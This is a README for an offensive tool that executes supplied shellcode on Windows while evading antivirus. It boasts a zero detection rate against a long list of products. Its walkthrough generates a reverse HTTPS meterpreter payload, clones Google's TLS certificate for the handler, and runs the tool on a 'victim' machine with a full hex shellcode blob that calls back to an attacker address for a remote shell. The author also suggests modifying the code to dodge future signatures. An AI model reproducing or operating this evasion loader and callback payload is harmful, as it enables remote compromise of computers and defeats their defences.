

SimpleShellcodeInjector (SSI)



SimpleShellcodeInjector or SSI receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application and it stays under the radar for tools like Get-InjectedThread.
At the moment, many antivirus solutions will not detect it, even when you execute a meterpreter's shellcode, without obfuscation.
Let me note that, although you can use SSI in order to recieve a meterpreter, it is NOT a stager for metasploit. It just executes the shellcode you feed it.

Antivirus Detection (Rate: 0/30)

Actively Tested

At the moment, it has been actively tested against the following solutions (default settings - fully updated) and it returned a reverse meterpreter with success:

Victim's OS: Windows 10 64 bit


url: https://antiscan.me/scan/new/result?id=2aZkjhzd1sHe

Detection rate (0/26)

Scan Date: 20-04-2019 20:00:38

d-Aware Antivirus: Clean

AhnLab V3 Internet Security: Clean

Alyac Internet Security: Clean

Avast: Clean

AVG: Clean

Avira: Clean

BitDefender: Clean

BullGuard: Clean

ClamAV: Clean

Comodo Antivirus: Clean

DrWeb: Clean

Emsisoft: Clean

Eset NOD32: Clean

Fortinet: Clean

F-Secure: Clean


Kaspersky: Clean

McAfee: Clean

Malwarebytes: Clean

Panda Antivirus: Clean

Sophos: Clean

Trend Micro Internet Security: Clean

Webroot SecureAnywhere: Clean

Windows 10 Defender: Clean

Zone Alarm: Clean

Zillya: Clean

Example Usage

A reverse https meterpreter example is being provided below. However, you can use any shellcode you like.

Important Note: Although some security solutions like Windows Defender do not detect the SSI as a virus, they can detect other factors which are not related to the SSI.For example they might detect metasploit's default certificate or the reverse tcp meterpreter.

Attacker's Machine: Generate payload for SSI:

$ i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
$ msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f c -o msf.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 545 bytes
Final size of c file: 2315 bytes
Saved as: msf.txt

$ cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"


Prepare Metasploit - SSL impersonation:

$ msfconsole
msf exploit(multi/handler) > use auxiliary/gather/impersonate_ssl
msf auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
RHOST => www.google.com
sf auxiliary(gather/impersonate_ssl) > run

[*] www.google.com:443 - Connecting to www.google.com:443
[*] www.google.com:443 - Copying certificate from www.google.com:443
/C=US/ST=California/L=Mountain View/O=Google LLC/CN=www.google.com 
[*] www.google.com:443 - Beginning export of certificate files
[*] www.google.com:443 - Creating looted key/crt/pem files for www.google.com:443
[+] www.google.com:443 - key: /home/gweeperx/.msf4/loot/20180816131826_default_216.58.212.36_www.google.com_k_829605.key
[+] www.google.com:443 - crt: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_c_997519.crt
[+] www.google.com:443 - pem: /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
[*] Auxiliary module execution completed

Prepare Metasploit - Handler:

msf auxiliary(gather/impersonate_ssl) > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set HandlerSSLCert /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
HandlerSSLCert => /home/gweeperx/.msf4/loot/20180816131827_default_216.58.212.36_www.google.com_p_032017.pem
msf exploit(multi/handler) > set LHOST
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 

Victim's Machine:

C:\Users\gweeperx\Desktop>ssi.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368bb010000e81a0100002f303430705247463070385f53396450306959436451676264466553636e6c4346787333785a4e4a4a355072346d6430634b6f68366e64374d634973644b4239646249463958534c3435325f76456c74785472556452644b6e77447275547762767630794b5069796d544c726751395f2d326e7a626f30336530527255346848664961694a6f644f634a00506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c0751468881300006844f035e0ffd54f75cde84a0000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe86bffffff31302e31302e3131332e32303800bbf0b5a2566a0053ffd5
 +-+-+-+ +-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |S|S|I| |(|S|i|m|p|l|e| |S|h|e|l|l|c|o|d|e| |I|n|j|e|c|t|o|r|)|
 +-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |b|y| |g|w|e|e|p|e|r|x|
 +-+-+ +-+-+-+-+-+-+-+-+

Ready? Go!

Enjoy your shell.


I tried to make it as simple as i could, in hope that it will be easy for anyone to make a few changes in the code and avoid AV signatures which will arise after the release of this tool.

DON'T forget to wear your white hat before you use it. ;-)